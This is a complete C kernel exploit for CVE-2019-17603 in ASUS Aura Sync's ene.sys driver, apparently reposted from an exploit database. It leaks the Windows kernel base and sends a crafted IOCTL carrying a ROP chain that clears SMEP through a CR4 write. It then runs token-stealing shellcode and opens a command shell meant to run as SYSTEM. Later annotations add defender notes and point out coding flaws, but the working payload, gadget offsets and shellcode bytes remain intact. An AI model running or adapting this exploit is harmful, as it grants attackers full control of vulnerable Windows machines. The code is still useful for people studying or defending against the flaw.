
ASUS Aura Sync 1.07.71 Privilege Escalation Exploit

26 Jun 2020 00:00:00 — Reported by Connor McGarr — Type: zdt — Source: 0day.today

ASUS Aura Sync 1.07.71 Privilege Escalation Exploit — Windows 10 RS1 Version 10.0.14393 Build 14393; vulnerable IOCTL in ene.sys; kernel base leak; ROP chain execution.

// CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit
// Discovered by @dhn_
// Author of PoC: Connor McGarr (@33y0re - https://connormcgarr.github.io)
// Windows 10 RS1 Version 10.0.14393 Build 14393
// Tested with VBS, HyperGuard, and PatchGuard disabled

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL in ene.sys
#define IOCTL_CODE 0x80102040

// Returns the load address of the first entry reported by EnumDeviceDrivers().
// The author relies on that first entry being ntoskrnl.exe (comment below);
// the module name is never checked, so the assumption is environment-dependent
// -- confirm before relying on it.
//
// Defender note: EnumDeviceDrivers() handing kernel-mode addresses to an
// unprivileged caller is the "kernel base leak" named in the page title; later
// Windows builds are understood to restrict this to privileged callers --
// verify for the build in question.
// On API failure the function terminates the process with exit(1) rather than
// returning an error to the caller.
unsigned long long kernelBase()
{

  // Defining EnumDeviceDrivers() parameters
  // Fixed 1024-entry array. lpcbNeeded is purely an out-parameter here: it is
  // never compared with sizeof(lpImageBase) afterwards, so a truncated list
  // would go unnoticed.
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;

  // Calling EnumDeviceDrivers()
  printf("[+] Calling EnumDeviceDrivers()...\n");

  BOOL baseofDrivers = EnumDeviceDrivers(
    lpImageBase,
    sizeof(lpImageBase),
    &lpcbNeeded
  );

  // Error handling
  if (!baseofDrivers)
  {
    // GetLastError() returns a DWORD; %d expects int (%lu matches the type).
    // exit() is declared in <stdlib.h>, which is not among the includes at the
    // top of the file; it resolves only if a Windows header pulls it in -- confirm.
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
    exit(1);
  }

  // ntoskrnl.exe is the first module dumped in the array
  // Typcasting LPVOID to unsigned long long
  unsigned long long krnlBase = (unsigned long long)lpImageBase[0];

  // Print update for kernel base
  printf("[+] Found kernel leak!\n");
  printf("[+] ntoskrnl.exe is located at: 0x%llx\n", krnlBase);

  return krnlBase;
}

// Builds the 88-byte IOCTL input buffer for the ene.sys device and sends it.
// From offset 56 the buffer carries three 8-byte ROP entries (pop rcx / a CR4
// value / mov cr4, rcx -- per the gadget comments below) followed by the
// user-mode address of the shellcode, i.e. the chain is meant to clear SMEP
// before control reaches user memory. All addresses and offsets are tied to
// Windows 10 build 14393 (file header and ROP comments).
//
// Defender note: the file header states the test ran with VBS, HyperGuard and
// PatchGuard disabled; those are the platform mitigations relevant to an
// unsanctioned CR4 write, so the technique is presumably not expected to work
// with them on -- confirm. The observable on a host is an unprivileged process
// opening \\.\EneIo and issuing IOCTL_CODE; a third-party driver of this kind
// is also a candidate for the vulnerable-driver blocklist -- verify the listed
// versions. Every API failure ends the process via exit(1); on success neither
// the driver handle nor the VirtualAlloc'd region is released (no CloseHandle
// or VirtualFree in this function).
void exploitWork(void)
{
  /*
    [BITS 64]
    _start:
      mov rax, [gs:0x188]  ; Current thread (_KTHREAD)
      mov rax, [rax + 0xb8]  ; Current process (_EPROCESS)
      mov rbx, rax    ; Copy current process (_EPROCESS) to rbx
    __loop:
      mov rbx, [rbx + 0x2e8]   ; ActiveProcessLinks
      sub rbx, 0x2e8    ; Go back to current process (_EPROCESS)
      mov rcx, [rbx + 0x2e0]   ; UniqueProcessId (PID)
      cmp rcx, 4     ; Compare PID to SYSTEM PID 
      jnz __loop    ; Loop until SYSTEM PID is found
      mov rcx, [rbx + 0x358]  ; SYSTEM token is @ offset _EPROCESS + 0x358
      and cl, 0xf0    ; Clear out _EX_FAST_REF RefCnt
      mov [rax + 0x358], rcx  ; Copy SYSTEM token to current process
      xor rax, rax    ; STATUS_SUCCESS
      add rsp, 0xa0    ; Restore execution
      ret      ; Done!
  */
  
  // Machine code for the listing above. The structure offsets it embeds
  // (0x188, 0xb8, 0x2e8, 0x2e0, 0x358) are, per the listing's own comments,
  // _KTHREAD/_EPROCESS field offsets for the build named in the file header;
  // they differ on other builds. The 'add rsp, 0xa0' presumably matches the
  // driver frame the ROP chain pivots out of -- not verified here.
  char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00\x48\x8B\x80"
       "\xB8\x00\x00\x00\x48\x89\xC3\x48\x8B\x9B\xF0"
       "\x02\x00\x00\x48\x81\xEB\xF0\x02\x00\x00\x48"
       "\x8B\x8B\xE8\x02\x00\x00\x48\x83\xF9\x04"
       "\x75\xE5\x48\x8B\x8B\x58\x03\x00\x00\x80"
       "\xE1\xF0\x48\x89\x88\x58\x03\x00\x00\x48\x31\xC0"
       "\x48\x81\xC4\xA0\x00\x00\x00\xC3";

  // Allocating shellcode in user mode
  // 0x3000 == MEM_COMMIT | MEM_RESERVE, 0x40 == PAGE_EXECUTE_READWRITE, i.e.
  // one RWX user page sized to the payload (including its NUL terminator).
  LPVOID shellcode = VirtualAlloc(
    NULL,
    sizeof(payload),
    0x3000,
    0x40
    );

  // Error handling
  if (!shellcode)
  {
    // GetLastError() returns a DWORD; %d expects int (%lu matches).
    printf("[-] Error! Unable to allocate shellcode in user mode. Error: %d\n", GetLastError());
    exit(1);
  }

  // Print statement for exploit
  printf("[+] CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit\n");

  // Print update for shellcode location
  // shellcode is an LPVOID; %llx expects unsigned long long (%p matches the type).
  printf("[+] Shellcode allocated at: 0x%llx\n", shellcode);

  // Moving memory into allocated space in user mode
  RtlMoveMemory(
    shellcode,
    payload,
    sizeof(payload)
    );

  // Running kernelBase() here to get base of kernel for ROP gadgets
  unsigned long long baseAddress = kernelBase();

  // Defining buffer and buffer size to send to the driver
  // Fixed 88-byte input; the chain starts at offset 56 (see the memcpy calls),
  // presumably the distance from the driver's copy destination to its saved
  // return address -- derived by the author, not verified here.
  char buf [88];
  size_t gadgetSize = 0x8;

  // ROP gadgets are for Windows 10 RS1 Version 10.0.14393 Build 14393
  // Run rp++ on the target before execution to adjust offsets accordingnly
  // rp++.exe -f C:\Windows\system32\ntoskrnl.exe -r 5 >> NTOSKRNL_GADGETS.exe

  // Defining ROP gadgets
  // ROP1 and ROP3 are kernel-base-relative; ROP2 is an immediate loaded into
  // rcx by ROP1 and written to CR4 by ROP3.
  unsigned long long ROP1 = baseAddress + 0x4666b;  // pop rcx ; ret: ntoskrnl.exe
  unsigned long long ROP2 = 0x70678;      // Intended CR4 value (0x70678) Windows 10 RS1 Version 10.0.14393 Build 14393
  unsigned long long ROP3 = baseAddress + 0x1d87d7;  // mov cr4, rcx ; ret: ntoskrnl.exe

  // Using memset to copy memory into array
  // Fills all 88 bytes with 0x41 ('A') before the chain is laid in.
  // memset/memcpy are declared in <string.h>, which is not included above --
  // same transitive-include caveat as exit().
  memset(buf, 0x41, 88);

  // Print update for ROP chain
  // Layout: [56] ROP1, [64] ROP2, [72] ROP3, [80] user-mode shellcode address.
  // The last memcpy copies the pointer variable itself (&shellcode), i.e. the
  // address of the RWX page, not its contents.
  printf("[+] Exedcuting ROP chain to disable SMEP...\n");
  memcpy(&buf[56], &ROP1, gadgetSize);
  memcpy(&buf[56+8], &ROP2, gadgetSize);
  memcpy(&buf[56+16], &ROP3, gadgetSize);
  memcpy(&buf[56+24], &shellcode, 0x8);

  // Obtaining handle to the driver
  // 0xC0000000 == GENERIC_READ | GENERIC_WRITE, 0x3 == OPEN_EXISTING, no sharing.
  printf("[+] Obtaining handle to the driver via CreateFileA()...\n");
  HANDLE drvHandle = CreateFileA(
    "\\\\.\\EneIo",
    0xC0000000,
    0x0,
    NULL,
    0x3,
    0x0,
    NULL
  );

  // Error handling
  // CreateFileA signals failure with INVALID_HANDLE_VALUE ((HANDLE)-1), not
  // NULL, so this test never fires; the comparison should be against
  // INVALID_HANDLE_VALUE.
  if (!drvHandle)
  {
    printf("[-] Error! Unable to obtain a handle to the driver. Error: %d\n", GetLastError());
    exit(1);
  }

  // Print update for HANDLE
  // drvHandle is pointer-sized; %d expects int (%p matches the type).
  printf("[+] Handle to the driver: %d\n", drvHandle);

  // Sending buffer to the driver

  // Defining lpBytesReturned parameter
  // Out-parameter only; written by DeviceIoControl, never read here.
  DWORD lpBytesReturned;
  
  // Invoking IOCTL routine
  // Input is the full 88-byte buffer; no output buffer is supplied (NULL, 0).
  BOOL sendIoctl = DeviceIoControl(
    drvHandle,
    IOCTL_CODE,
    buf,
    sizeof(buf),
    NULL,
    0,
    &lpBytesReturned,
    NULL
    );

  // Error handling
  if (!sendIoctl)
  {
    printf("[-] Error! Unable to interact with the driver. Error: %d\n", GetLastError());
    exit(1);
  }

  // Success of the IOCTL call is the only thing checked; whether the token swap
  // actually happened is not verified before returning. drvHandle is not closed.
  printf("[+] Interacting with the driver...\n");
}

// Entry point: runs exploitWork() and then launches a shell. argc/argv are unused.
// system() is declared in <stdlib.h>, which is not among the includes at the
// top of the file -- same transitive-include caveat as exit().
// The shell is started unconditionally once exploitWork() returns; that
// function only terminates on Win32 API errors and does not confirm the
// privilege change, so a silently failed attempt still yields a shell at the
// caller's original privilege level.
int main(int argc, char *argv[])
{
  exploitWork();

  // Print update for NT AUTHORITY\SYSTEM shell
  printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

  // Spawning an NT AUTHORITY\SYSTEM shell
  // The command is a fixed literal (no user input reaches system()).
  system("cmd.exe /c cmd.exe /K cd C:\\");

  return 0;
}
